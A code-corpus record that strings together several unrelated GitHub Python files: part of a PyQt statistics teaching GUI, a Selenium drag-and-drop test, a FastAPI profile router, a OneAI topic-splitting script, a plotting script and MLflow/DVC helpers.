def Openfile_coe(self):
try:
self.filename = QFileDialog.getOpenFileName(self, 'ChooseFile')[0]
self.Openfile_coe2()
except Exception as r:
self.Error()
def loader(self):
with open(self.filename, 'r') as f:
f_csv = csv.reader(f)
csv_list = []
for row in f_csv:
csv_list.append(row)
x = csv_list[0]
x = list(map(int, x))
y = csv_list[1]
y = list(map(int, y))
return x, y
def Openfile_coe2(self):
x, y = self.loader()
cov = np.cov(*self.loader())
result1 = cov[0, 0] * cov[1, 1]
result2 = cov[0, 1] * cov[1, 0]
if result1 != 0 and result2 != 0: # Check whether the data is independent
coefxy = np.corrcoef(x, y)
pxy = coefxy[0, 1]
res = linregress(x, y)
y1 = res.intercept + np.multiply(res.slope, x)
plt.plot(x, y, marker='o', linestyle='None')
plt.xlabel('x')
plt.ylabel('y')
plt.plot(x, y1, c='r', label='fitted line')
plt.title(f"r = {pxy:.{self.sp[5].value()}f} Fitted line: y = {res.intercept:.{self.sp[5].value()}f}"
f" + {res.slope:.{self.sp[5].value()}f} * x")
plt.legend()
plt.grid()
plt.show()
else:
plt.plot(x, y, marker='o', linestyle='None')
plt.xlabel('x')
plt.ylabel('y')
plt.title(f"r = {0:.{self.sp[5].value()}f} No fitted line")
plt.grid()
plt.show()
'===================CCF========================='
def stackUI6(self):
layout = QVBoxLayout()
layout_i = [QGridLayout() for i in range(2)]
self.group[6] = [QGroupBox(text, self) for text in ['Example', 'Input Data']]
for i, j in zip(self.group[6], layout_i):
i.setLayout(j)
layout.addWidget(i)
self.pb[6] = [QPushButton(i) for i in ["CCF", "ACF", "ACF_Rxx", "AddFile1_CCF", "AddFile2_ACF",
"AddFile3_Linear_Regression"]]
list_00 = [1, 1, 1, 1, 1, 1]
list_01 = [0, 1, 2, 0, 1, 2]
list_02 = [self.ccf, self.acf, self.acf_Rxx, self.add_file_01, self.add_file_02, self.add_file_03]
for i, *j, k in zip(self.pb[6][:3], list_00[:3], list_01[:3], list_02[:3]):
layout_i[0].addWidget(i, *j)
layout_i[0].addWidget(i)
i.clicked.connect(k)
for i, *j, k in zip(self.pb[6][3:], list_00[3:], list_01[3:], list_02[3:]):
layout_i[1].addWidget(i, *j)
layout_i[1].addWidget(i)
i.clicked.connect(k)
self.stack[6].setLayout(layout)
def acf_Rxx(self):
# x = np.array([50,47,60,88,20,19,12,57,49,33,42,10,99,22,58,67,90,56,33,74,23,62,90,29,74,10,29,74,57,15])
x1 = np.arange(1, 50, 0.01)
x2 = np.cos(x1)
x3 = x2
n = len(x3)
o = np.arange(1 - n, n)
var = np.var(x3, ddof=1)
mx = np.mean(x3)
autocorrelation = np.correlate(x3, x3, 'full')
plt.plot(o, autocorrelation, marker='o', linestyle='None')
plt.plot([1 - n, n], [var + mx * 2, var + mx * 2], c='g', linestyle='--')
plt.plot([1 - n, n], [mx * 2, mx * 2], c='r', linestyle='--')
plt.xlabel('Time')
plt.ylabel('R')
plt.title('Autocorrelation function')
plt.grid()
plt.show()
def ccf(self):
x = np.array([50, 47, 60, 88, 20, 19, 12, 57, 49, 33, 42, 10, 99, 22, 58, 67, 90, 56, 33, 74, 23, 62, 90, 29,
74, 10, 29, 74, 57, 15])
y = np.array([20, 70, 66, 40, 53, 22, 14, 68, 43, 89, 54, 55, 3, 78, 56, 4, 9, 41, 14, 24, 68, 64, 87, 45, 33,
67, 55, 22, 86, 45])
n = len(x)
o = np.arange(1 - n, n)
crosscorrelation = np.correlate(x, y, 'full')
plt.plot(o, crosscorrelation, marker='o', linestyle='None')
plt.xlabel('Time')
plt.ylabel('R')
plt.title('Cross correlation function')
plt.grid()
plt.show()
def acf(self):
x = np.array([50, 47, 60, 88, 20, 19])
n = len(x)
o = np.arange(1 - n, n)
autocorrelation = np.correlate(x, x, 'full')
plt.plot(o, autocorrelation, marker='o', linestyle='None')
plt.xlabel('Time')
plt.ylabel('R')
plt.title('Autocorrelation function')
plt.grid()
plt.show()
'------------------------------------------------------'
'-------------------------------------------------------'
def stackUI7(self):
pass
def get_data(self, func, title):
try:
x, y = self.loader()
n = len(x)
o = np.arange(1 - n, n)
correlation = func(x, y)
plt.plot(o, correlation, marker='o')
plt.xlabel('Time')
plt.ylabel('R')
plt.title(title)
plt.show()
plt.grid()
except:
self.Error()
def add_file_01(self):
try:
self.filename = QFileDialog.getOpenFileName(self, 'ChooseFile')[0]
self.get_data(lambda x, y: np.correlate(x, y, 'full'), 'Cross correlation function')
except:
self.Error()
def add_file_02(self):
try:
self.filename = QFileDialog.getOpenFileName(self, 'ChooseFile')[0]
self.get_data(lambda x, y: np.correlate(x, x, 'full'), 'Autocorrelation function')
except:
self.Error()
def add_file_03(self):
try:
self.filename = QFileDialog.getOpenFileName(self, 'ChooseFile')[0]
self.get_data3()
except:
self.Error()
def get_data3(self):
try:
x, y = self.loader()
res = linregress(x, y)
y1 = res.intercept + np.multiply(res.slope, x)
plt.plot(x, y, 'o', label='original data')
plt.plot(x, y1, 'r', label='fitted line')
plt.legend()
plt.show()
except:
self.Error()
'------------------AR-----------------------------'
'-------------------------AR Model----------------------------------'
def stackUI8(self): # This part is the application of ARMA Model in the economic field, which is inconsistent
# with the teaching purpose of this lecture
# layout = QVBoxLayout()
#
# self.pb81 = QPushButton('Dataset')
# self.pb82 = QPushButton('coefficient')
# self.pb84 = QPushButton('Prediction')
# self.pb81.clicked.connect(self.Dataset)
# self.pb82.clicked.connect(self.coefficient)
# self.pb84.clicked.connect(self.Prediction)
#
# self.df = pd.read_csv(
# 'https://raw.githubusercontent.com/jbrownlee/Datasets/master/daily-min-temperatures.csv',
# index_col=0, parse_dates=True)
#
# layout.addWidget(self.pb81)
# layout.addWidget(self.pb82)
# layout.addWidget(self.pb84)
# self.stack8.setLayout(layout)
pass
def Dataset(self):
pass
# self.df.plot()
# plt.show()
def coefficient(self):
pass
# a = self.df.Temp
# b = self.df.Temp.shift(1)
# coefficient = pearsonr(a[1:], b[1:])
# lag_plot(self.df)
# plt.title('Correlation coefficient:r = {:.2f}'.format(coefficient[0]))
# plt.show()
def ACF_PACF(self):
pass
# fig, axes = plt.subplots(2, 1)
# plot_acf(self.df['Temp'], ax=axes[0])
# plot_pacf(self.df['Temp'], ax=axes[1])
#
# plt.tight_layout()
# plt.show()
def Prediction(self):
pass
# x = self.df.values
# train, test = x[:-7], x[-7:]
# model_fit = AR(train).fit()
# params = model_fit.params
# p = model_fit.k_ar
# # p = 1
# history = train[-p:]
# history = np.hstack(history).tolist()
# test = np.hstack(test).tolist()
#
# predictions = []
# for t in range(len(test)):
# lag = history[-p:]
# yhat = params[0]
# for i in range(p):
# yhat += params[i + 1] * lag[p - 1 - i]
# predictions.append(yhat)
# obs = test[t]
# history.append(obs)
# print(np.mean((np.array(test) - np.array(predictions)) ** 2))  # compute the mean_squared_error (MSE)
# plt.plot(test, color='b',label='Reality')
# plt.plot(predictions, color='r',label='Prediction')
# plt.legend()
# plt.show()
def stackUI9(self):
layout = QVBoxLayout()
layout_i = [QGridLayout() for i in range(2)]
self.group[9] = [QGroupBox(text, self) for text in ['Sample generate', 'Graphic']]
for i, j in zip(self.group[9], layout_i):
i.setLayout(j)
layout.addWidget(i)
self.label[9] = [QLabel(text) for text in ["b1:", "σw^2"]]
self.le[9] = [QLineEdit() for i in range(2)]
self.pb[9] = []
for i, j in zip(["Execute", "Rxx", "rxx"], [self.sample_generate91, self.Rxx91, self.rxx91]):
self.pb[9].append(QPushButton(i))
self.pb[9][-1].clicked.connect(j)
list_00 = [*self.label[9], *self.le[9], *self.pb[9]]
list_01 = [2, 3, 2, 3, 4, 1, 2]
list_02 = [0, 0, 1, 1, 2, 1, 1]
for i in zip(list_00[:5], list_01[:5], list_02[:5]):
layout_i[0].addWidget(*i)
for i in zip(list_00[5:], list_01[5:], list_02[5:]):
layout_i[1].addWidget(*i)
self.stack[9].setLayout(layout)
def sample_generate91(self):
try:
b1 = float(self.le[9][0].text())
# statsmodels' arma_generate_sample expects the AR lag-polynomial coefficients,
# i.e. the AR parameter with the opposite sign (zero-lag coefficient first)
ar_coefs = [1, -b1]
ma_coefs = [1, 0]
sigma_s = float(self.le[9][1].text())
max_lag = 15
y = arma_generate_sample(ar_coefs, ma_coefs, nsample=100)
x = np.arange(100)
plt.plot(x, y)
plt.title('Time Series b1 = {} σw^2 = {}'.format(b1, sigma_s))
plt.show()
except:
self.Error()
def Rxx91(self):
try:
b1 = float(self.le[9][0].text())
sigma_w_2 = float(self.le[9][1].text())
sigma_x_2 = sigma_w_2 / (1 - b1 ** 2)
Rxx = []
for m in range(-10, 11, 1):
y = b1 ** abs(m) * sigma_x_2
Rxx.append(y)
x = np.arange(-10, 11)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(x, Rxx, 'bo')
ax.set_ylim([0, None])
plt.title('Rxx b1 = {} σw^2 = {}'.format(b1, sigma_w_2))
plt.grid()
plt.show()
except:
self.Error()
# coefficient
def rxx91(self):
try:
b1 = float(self.le[9][0].text())
sigma_w_2 = float(self.le[9][1].text())
sigma_x_2 = sigma_w_2 / (1 - b1 ** 2)
Rxx = []
for m in range(0, 11, 1):
y = b1 ** abs(m) * sigma_x_2
Rxx.append(y)
rxx = []
for i in Rxx:
i /= sigma_x_2
rxx.append(i)
x = np.arange(0, 11)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(x, rxx, 'bo')
ax.set_ylim([0, None])
plt.title('rxx b1 = {} σw^2 = {}'.format(b1, sigma_w_2))
plt.grid()
plt.show()
except:
self.Error() # coeff
'-------------------------Estimation Model----------------------------------'
def stackUI10(self):
layout = QVBoxLayout()
glayout = QGridLayout()
gbox = QWidget()
gbox.setLayout(glayout)
self.combobox[9] = QComboBox()
self.combobox[10] = QComboBox()
font31 = QFont()
font31.setPointSize(16)
self.combobox[9].setFont(font31)
self.combobox[10].setFont(font31)
list_00 = ["Please select Distribution", "Beta_Distribution", "Cauchy_Distribution",
"F_Distribution", "Gamma_Distribution", "Laplace_Distribution", "Logistic_Distribution",
"Lomax_Distribution", "Lognorm_Distribution", "Normal_Distribution", "Rayleigh_Distribution"]
list_001 = ["Please fit Distribution", "Beta_Distribution", "Binomial_Distribution", "Cauchy_Distribution",
"F_Distribution", "Gamma_Distribution", "Laplace_Distribution", "Logistic_Distribution",
"Lomax_Distribution", "Lognorm_Distribution", "Normal_Distribution", "Rayleigh_Distribution"]
for i in list_00:
self.combobox[10].addItem(i)
for i in list_001:
self.combobox[9].addItem(i)
self.combobox[10].currentIndexChanged.connect(self.Select_onChange101)
self.le[10] = [QLineEdit() for i in range(2)]
self.label[10] = [QLabel()] + [QLabel(text) for text in [" ", "1. parameter:", "2. parameter:"]]
self.label[10][1].setFont(QFont('Sanserif', 15))
self.label[10][1].setStyleSheet("font:bold")
self.pb[10] = []
for i, j in zip(['Execute', 'Clear', 'Help', 'Fit'],
[self.Simulation, self.clear101, self.msg10, self.fit]):
self.pb[10].append(QPushButton(i))
self.pb[10][-1].clicked.connect(j)
for i in [self.combobox[10], self.combobox[9], *self.label[10][:2], gbox]:
layout.addWidget(i)
list_00 = [*self.label[10][2:], *self.le[10], *self.pb[10]]
list_01 = [1, 2, 1, 2, 2, 4, 1, 3]
list_02 = [0, 0, 1, 1, 2, 2, 2, 2]
for i in zip(list_00, list_01, list_02):
glayout.addWidget(*i)
self.stack[10].setLayout(layout)
def clear101(self, index=10):
for i in self.le[index]:
i.clear()
def Select_onChange101(self):
switcher = {
"Binomial_Distribution": ["binomial.svg", [200, 60], 'n={}\n' 'p={}'],
"Normal_Distribution": ["normal.svg", [200, 60], 'μ={}\n' 'σ²={}'],
"Poisson_Distribution": ["poisson.svg", [250, 70], 'λ={}'],
"Rayleigh_Distribution": ["rayleigh.svg", [250, 60], 'σ={}'],
"Beta_Distribution": ["Beta.svg", [200, 60], 'α={}\n' 'β={}'],
"F_Distribution": ["f.svg", [450, 350], 'd1={}\n' 'd2={}'],
"Gamma_Distribution": ["gamma2.svg", [300, 50], 'k={} θ={}'],
"Geometric_Distribution": ["geometric.svg", [290, 60], 'p={}'],
"Lognorm_Distribution": ["lognorm.svg", [250, 60], 'μ={}\n' 'σ={}'],
"Chi2_Distribution": ["chi2.svg", [300, 140], 'df={}'],
"Cauchy_Distribution": ["cauchy.svg", [350, 80], 'x0={}\n' 'γ={}'],
"Laplace_Distribution": ["laplace.svg", [200, 60], 'μ={}\n' 'λ={}'],
"T_Distribution": ["t.svg", [300, 90], 'v={}'],
"Expon_Distribution": ["exponential.svg", [200, 60], 'λ={}'],
"Weibull_Distribution": ["weibull.svg", [350, 80], 'λ={}\n' 'a={}'],
"Negative_Binomial_Distribution": ["negativ.svg", [300, 60], 'n={}\n' 'p={}'],
"Lomax_Distribution": ["lomax.svg", [250, 60], 'λ={}\n' 'α={}'],
"Logistic_Distribution": ["logistic.svg", [300, 170], 'μ={}\n' 's={}']
}
if self.combobox[10].currentText() == 'Please select Distribution':
self.label[10][0].setText(' ')
self.label[10][1].setText(' ')
elif self.combobox[10].currentText() == 'Zipf_Distribution':
self.label[10][0].setText('No pic')
self.label[10][0].setScaledContents(True)
self.label[10][0].setMaximumSize(200, 60)
self.label[10][1].setText('a={}')
else:
i = switcher.get(self.combobox[10].currentText(), None)
self.label[10][0].setPixmap(QPixmap(i[0]))
self.label[10][0].setScaledContents(True)
self.label[10][0].setMaximumSize(*i[1])
self.label[10][1].setText(i[2])
def msg10(self):
QMessageBox.about(self, "Help", "The simulator generates a probability distribution\n"
"which is then fitted to estimate its parameters.\n"
"Inputboxes support a sets of parameters like '4'")
def Simulation(self):
try:
a = 0
b = 0
a = float(self.le[10][0].text())
b = float(self.le[10][1].text())
switcher = {
# "Binomial_Distribution": Simulation_fit.getParament(a, b).binomial_P,
"Normal_Distribution": Simulation_fit.getParament(a, b).normal_P,
"Rayleigh_Distribution": Simulation_fit.getParament(a, b).rayleigh_P,
"Beta_Distribution": Simulation_fit.getParament(a, b).beta_P,
"F_Distribution": Simulation_fit.getParament(a, b).f_P,
"Gamma_Distribution": Simulation_fit.getParament(a, b).gamma_P,
"Lognorm_Distribution": Simulation_fit.getParament(a, b).lognorm_P,
"Cauchy_Distribution": Simulation_fit.getParament(a, b).cauchy_P,
"Laplace_Distribution": Simulation_fit.getParament(a, b).laplace_P,
"Lomax_Distribution": Simulation_fit.getParament(a, b).lomax_P,
"Logistic_Distribution": Simulation_fit.getParament(a, b).logistic_P
}
X = switcher.get(self.combobox[10].currentText(), lambda: None)()
fig = plt.figure()
Simulation_fit.fit_Funktion(X).Sim()
except:
self.Error()
def fit(self):
try:
a = 0
b = 0
a = float(self.le[10][0].text())
# print(a)
b = float(self.le[10][1].text())
# print(b)
switcher = {
# "Binomial_Distribution": Simulation_fit.getParament(a, b).binomial_P,
"Normal_Distribution": Simulation_fit.getParament(a, b).normal_P,
"Rayleigh_Distribution": Simulation_fit.getParament(a, b).rayleigh_P,
"Beta_Distribution": Simulation_fit.getParament(a, b).beta_P,
"F_Distribution": Simulation_fit.getParament(a, b).f_P,
"Gamma_Distribution": Simulation_fit.getParament(a, b).gamma_P,
"Lognorm_Distribution": Simulation_fit.getParament(a, b).lognorm_P,
"Cauchy_Distribution": Simulation_fit.getParament(a, b).cauchy_P,
"Laplace_Distribution": Simulation_fit.getParament(a, b).laplace_P,
"Lomax_Distribution": Simulation_fit.getParament(a, b).lomax_P,
"Logistic_Distribution": Simulation_fit.getParament(a, b).logistic_P
}
X = switcher.get(self.combobox[10].currentText(), lambda: None)()
fig = plt.figure()
switcher_new = {
"Binomial_Distribution": Simulation_fit.getParament(a, b).binomial_P,
"Normal_Distribution": Simulation_fit.fit_Funktion(X).normal_Fit,
"Rayleigh_Distribution": Simulation_fit.fit_Funktion(X).rayleigh_Fit,
"Beta_Distribution": Simulation_fit.fit_Funktion(X).beat_Fit,
"F_Distribution": Simulation_fit.fit_Funktion(X).f_Fit,
"Gamma_Distribution": Simulation_fit.fit_Funktion(X).gamma_Fit,
"Lognorm_Distribution": Simulation_fit.fit_Funktion(X).lognorm_Fit,
"Cauchy_Distribution": Simulation_fit.fit_Funktion(X).cauchy_Fit,
"Laplace_Distribution": Simulation_fit.fit_Funktion(X).laplace_Fit,
"Lomax_Distribution": Simulation_fit.fit_Funktion(X).lomax_Fit,
"Logistic_Distribution": Simulation_fit.fit_Funktion(X).logistic_Fit
}
switcher_new.get(self.combobox[9].currentText(), lambda: None)()
except:
self.Error()
'-------------------------confidence ellipse----------------------------------'
def stackUI11(self):
vlayout = QVBoxLayout(self.stack[11])
gridlayout = QGridLayout()
grid = QWidget()
grid.setLayout(gridlayout)
vlayout.addWidget(grid)
self.le[11] = [QLineEdit() for i in range(4)]
list_00 = ["pb1_1", "pb1_2", "pb1_3", "pb1_4", "help"]
list_01 = ["positive correlation", "negative correlation", "Weak correlation", "Clear", "Help"]
list_02 = [self.positive_correlation, self.negative_correlation, self.Weak_correlation,
self.clear111, self.msg11]
for i, j, k in zip(list_00, list_01, list_02):
self.var_dict[i] = QPushButton(j)
self.var_dict[i].clicked.connect(k)
for i, j in zip(["label11", "label12", "label13", "label14"], ["quantity:", "mu:", "scale", "std"]):
self.var_dict[i] = QLabel()
self.var_dict[i].setText(j)
list_03 = [self.var_dict["help"], self.var_dict["label11"], self.var_dict["label12"],
self.var_dict["label13"], self.var_dict["label14"], *self.le[11],
self.var_dict["pb1_1"], self.var_dict["pb1_2"], self.var_dict["pb1_3"], self.var_dict["pb1_4"]]
list_04 = [1, 2, 3, 4, 5, 2, 3, 4, 5, 2, 3, 4, 5]
list_05 = [2, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2]
for i in zip(list_03, list_04, list_05):
gridlayout.addWidget(*i)
def positive_correlation(self):
fig, ax_nstd = plt.subplots()
dependency_nstd = [[0.85, 0.35],
[0.15, -0.65]]
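# Assumption (based on the matplotlib confidence-ellipse example this mirrors):
# get_correlated_dataset multiplies i.i.d. normal samples by this 2x2 matrix,
# so its entries set the sign and strength of the induced correlation.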
sp = [self.le[11][i].text().split(',') for i in range(4)]
try:
n = int(self.le[11][0].text())
mu = list(map(int, sp[1]))
scale = list(map(int, sp[2]))
std = list(map(int, sp[3]))
ax_nstd.axvline(c='grey', lw=1)
x, y = get_correlated_dataset(n, dependency_nstd, mu, scale)
ax_nstd.scatter(x, y, s=0.5)
for i in range(len(std)):
colors = ['r', 'g', 'b']
confidence_ellipse(x, y, ax_nstd, n_std=std[i],
label=r'$%s\sigma$' % std[i], edgecolor=colors[i])
ax_nstd.scatter(mu[0], mu[1], c='red', s=3)
ax_nstd.set_title('Positive Correlation:Different standard deviations')
ax_nstd.legend()
plt.show()
except:
self.Error()
def negative_correlation(self):
fig, ax_nstd = plt.subplots()
dependency_nstd = [[0.9, -0.4],
[0.1, -0.6]]
sp = [self.le[11][i].text().split(',') for i in range(4)]
try:
n = int(self.le[11][0].text())
mu = list(map(int, sp[1]))
scale = list(map(int, sp[2]))
std = list(map(int, sp[3]))
ax_nstd.axvline(c='grey', lw=1)
x, y = get_correlated_dataset(n, dependency_nstd, mu, scale)
ax_nstd.scatter(x, y, s=0.5)
for i in range(len(std)):
colors = ['r', 'g', 'b']
confidence_ellipse(x, y, ax_nstd, n_std=std[i],
label=r'$%s\sigma$' % std[i], edgecolor=colors[i])
ax_nstd.scatter(mu[0], mu[1], c='red', s=3)
ax_nstd.set_title('Negative Correlation:Different standard deviations')
ax_nstd.legend()
plt.show()
except:
self.Error()
def Weak_correlation(self):
fig, ax_nstd = plt.subplots()
dependency_nstd = [[1, 0],
[0, 1]]
sp = [self.le[11][i].text().split(',') for i in range(4)]
try:
n = int(self.le[11][0].text())
mu = list(map(int, sp[1]))
scale = list(map(int, sp[2]))
std = list(map(int, sp[3]))
ax_nstd.axvline(c='grey', lw=1)
x, y = get_correlated_dataset(n, dependency_nstd, mu, scale)
ax_nstd.scatter(x, y, s=0.5)
for i in range(len(std)):
colors = ['r', 'g', 'b']
confidence_ellipse(x, y, ax_nstd, n_std=std[i],
label=r'$%s\sigma$' % std[i], edgecolor=colors[i])
ax_nstd.scatter(mu[0], mu[1], c='red', s=3)
ax_nstd.set_title('Weak Correlation:Different standard deviations')
ax_nstd.legend()
plt.show()
except:
self.Error()
def clear111(self, index=11):
for i in self.le[index]:
i.clear()
def msg11(self):
QMessageBox.about(self, "Help", "The simulator generates confidence ellipses\n"
"quantity support a sets of parameters like '500'\n"
"Other inputboxes support multiple sets of parameters like '8,5'")
'-------------------------Waveforms----------------------------------'
def stackUI12(self):
layout = QVBoxLayout(self.stack[12])
gridlayout = QGridLayout()
grid = QWidget()
grid.setLayout(gridlayout)
layout.addWidget(grid)
self.le[12] = [QLineEdit() for i in range(3)]
self.combobox[12] = QComboBox()
font31 = QFont()
font31.setPointSize(12)
self.combobox[12].setFont(font31)
list_00 = ["Please select mode", "square125", "square25", "square50", "square75", "triangle", "noise"]
for i in list_00:
self.combobox[12].addItem(i)
layout.addWidget(self.combobox[12])
list_00 = ["pb1_1", "pb1_2", "pb1_3", "pb1_4", "help"]
list_01 = ["Execute", "Save", "Read", "Clear", "Help"]
list_02 = [self.wave_generation, self.save_wave, reafWave,
self.clear111, self.msg11]
for i, j, k in zip(list_00, list_01, list_02):
self.var_dict[i] = QPushButton(j)
self.var_dict[i].clicked.connect(k)
for i, j in zip(["label11", "label12", "label13"], ["Sample-rate:", "Frequency:", "Time-lengh"]):
self.var_dict[i] = QLabel()
self.var_dict[i].setText(j)
list_03 = [self.var_dict["help"], self.var_dict["label11"], self.var_dict["label12"],
self.var_dict["label13"], *self.le[12],
self.var_dict["pb1_1"], self.var_dict["pb1_2"], self.var_dict["pb1_3"], self.var_dict["pb1_4"]]
list_04 = [1, 3, 4, 5, 3, 4, 5, 2, 3, 4, 5]
list_05 = [2, 0, 0, 0, 1, 1, 1, 2, 2, 2, 2]
for i in zip(list_03, list_04, list_05):
gridlayout.addWidget(*i)
def wave_generation(self):
try:
fig = plt.figure()
sample_rate = int(self.le[12][0].text())
fa = int(self.le[12][1].text())
t_length = float(self.le[12][2].text())
mode = str(self.combobox[12].currentText())
y, t = createWave(sample_rate=sample_rate, fa=fa, t_length=t_length, mode=mode)
plt.plot(t, y)
plt.title("%s" % mode)
plt.show()
except:
self.Error()
def save_wave(self):
try:
fig = plt.figure()
sample_rate = int(self.le[12][0].text())
fa = int(self.le[12][1].text())
t_length = float(self.le[12][2].text())
mode = str(self.combobox[12].currentText())
y, t = createWave(sample_rate=sample_rate, fa=fa, t_length=t_length, mode=mode)
saveWave(y=y, sample_rate=sample_rate, path=r'wave.wav')
except:
self.Error()
if __name__ == "__main__":
app = QApplication(sys.argv)
ex = Example()
ex.show()
sys.exit(app.exec_())
| lukascao/GUI_vorlesung | GUI_example.py | GUI_example.py | py | 54,545 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.Optional",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
... |
74649269864 | # -*- coding: utf-8 -*-
# @Project : selenium_event
# @File : test_alert.py
# @Software: PyCharm
# @Author : Lizhipeng
# @Email : 1907878011@qq.com
# @Time : 2021/9/26 17:16
from selenium.webdriver import ActionChains
from seleium_study.selenium_js.base import Base
class TestAlert(Base):
def test_alert(self):
self.driver.get('https://www.runoob.com/try/try.php?filename=jqueryui-api-droppable')
# switch into the result frame
self.driver.switch_to.frame('iframeResult')
top = self.driver.find_element_by_xpath('//*[@id="draggable"]')
end = self.driver.find_element_by_xpath('//*[@id="droppable"]')
# drag the 'top' element onto the 'end' element
action = ActionChains(self.driver)
action.drag_and_drop(top, end).perform()
# switch focus to the alert and click its OK button
self.driver.switch_to.alert.accept()
# switch back to the default frame
self.driver.switch_to.default_content()
self.driver.find_element_by_xpath('//*[@id="submitBTN"]').click()
| iospeng/python | pycharm_demo/selenium_event/seleium_study/selenium_file_alert/test_alert.py | test_alert.py | py | 1,036 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "seleium_study.selenium_js.base.Base",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "selenium.webdriver.ActionChains",
"line_number": 21,
"usage_type": "call"
}
] |
40586478771 | from fastapi import APIRouter, Depends, status
from sqlalchemy.ext.asyncio import AsyncSession
from src.authentication import AuthModel, get_token_user
from src.core.exceptions import UnprocessableEntityException
from src.db.postgres import get_db
from .dependencies import get_token_parent
from .parents.crud import parent_crud
from .parents.models import ParentModel
from .parents.schemes import ResponseParentScheme, UpdateParentScheme
router = APIRouter()
@router.get(
path="/me",
summary="View a personal profile",
response_model=ResponseParentScheme,
)
async def watch_me(
parent: ParentModel = Depends(get_token_parent),
):
return parent
@router.patch(
path="/me",
summary="Update a personal profile",
response_description="Successful Response returns only status code 200",
)
async def update_me(
*,
db: AsyncSession = Depends(get_db),
parent: ParentModel = Depends(get_token_parent),
update_data: UpdateParentScheme,
):
update_data = update_data.dict(exclude_none=True)
if not update_data:
return None
_, err = await parent_crud.update(db, parent, update_data)
if err is not None:
raise UnprocessableEntityException(detail=err)
return None
@router.delete(
path="/me",
summary="Delete a personal profile",
status_code=status.HTTP_204_NO_CONTENT,
response_description="Successful Response returns only status code 204",
)
async def delete_me(
db: AsyncSession = Depends(get_db),
auth_user: AuthModel = Depends(get_token_user),
):
await parent_crud.delete_auth(db, auth_user.email)
return None
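# Hedged usage note: elsewhere in the application this router is presumably mounted
# with something like `app.include_router(router, prefix="/parents")`; the prefix is
# an illustrative assumption, not taken from this repository.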
| Xewus/KidEdVisor | backend/src/parents/router.py | router.py | py | 1,626 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.APIRouter",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "parents.models.ParentModel",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "fastapi.Depends",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "dependen... |
35183490035 | import asyncio
import os
import oneai
from oneai import Input, Output
oneai.api_key = os.getenv("ONEAI_KEY")
async def split(filepath):
pipeline = oneai.Pipeline(
steps=[
oneai.skills.SplitByTopic(),
]
)
with open(filepath, 'r') as file_input:
output = await pipeline.run_batch_async([file_input], on_output=handle_success, on_error=handle_error)
print(f'OUTPUT = {output}')
def handle_success(input, output_map: [Input, Output]) -> None:
print(f'success: spans = ')
for span in output_map.segments.output_spans:
print(span)
def handle_error(input, output_map: [Input, Exception]) -> None:
print(f'failure: {output_map}')
asyncio.run(split('file_store/Auburn.txt'))
# asyncio.run(split('file_store/1_min_sample.mp3.txt'))
| clande/demo | oneai_splitbytopic_repro.py | oneai_splitbytopic_repro.py | py | 808 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "oneai.api_key",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "os.getenv",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "oneai.Pipeline",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "oneai.skills.SplitByTopic",... |
17579968573 | import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from numpy import *
import sys
file_name = sys.argv[1]
data1 = loadtxt("./" + file_name)
NUM=data1[:,0] #
TIME=data1[:,1] #
fig = plt.figure() #
top = fig.add_subplot(111) # 1 row, 1 column, figure 1
top.set_title('BRUTE FORCE')
top.grid()
top.set_xlabel('n')
top.set_ylabel('time')
top.plot(NUM, TIME)
#top.text(200,35,"Steps: "+str(int(STEPS)))
plt.savefig('fatt-brute-force.pdf')
#plt.show()
| UnProgrammatore/CCQ | altre_cose/fattorizzazione_mpi_banale_print/plot.py | plot.py | py | 480 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot... |
12676975577 | import mlflow
import dvc.api
import pandas as pd
def yield_artifacts(run_id, path=None):
"""Yield all artifacts in the specified run"""
client = mlflow.tracking.MlflowClient()
for item in client.list_artifacts(run_id, path):
if item.is_dir:
yield from yield_artifacts(run_id, item.path)
else:
yield item.path
def fetch_logged_data(run_id):
"""Fetch params, metrics, tags, and artifacts in the specified run"""
client = mlflow.tracking.MlflowClient()
data = client.get_run(run_id).data
# Exclude system tags: https://www.mlflow.org/docs/latest/tracking.html#system-tags
tags = {k: v for k, v in data.tags.items() if not k.startswith("mlflow.")}
artifacts = list(yield_artifacts(run_id))
return {
"params": data.params,
"metrics": data.metrics,
"tags": tags,
"artifacts": artifacts,
}
def dvc_open(path, url, branch):
with dvc.api.open(
path = path, ## data path
repo = url, ## github repo URL
rev = branch ## currently resolved by branch name
) as f:
return pd.read_csv(f, sep=",")
def find_experiment_id(experiment_name):
current_experiment = dict(mlflow.get_experiment_by_name(experiment_name))
return current_experiment["experiment_id"]
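# -- Hedged usage sketch: the repo URL, data path and branch below are placeholders,
# not values taken from this repository. --
def _example_usage():
    # Load a DVC-tracked CSV from a (hypothetical) repo and branch.
    df = dvc_open("data/bike.csv", "https://github.com/user/repo", "main")
    # Log a throwaway run, then read back everything recorded for it.
    with mlflow.start_run() as run:
        mlflow.log_param("rows", len(df))
        mlflow.log_metric("dummy_metric", 0.0)
    print(fetch_logged_data(run.info.run_id))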
| robert-min/bike_share_mlflow | model/utils.py | utils.py | py | 1,317 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mlflow.tracking.MlflowClient",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "mlflow.tracking",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "mlflow.tracking.MlflowClient",
"line_number": 18,
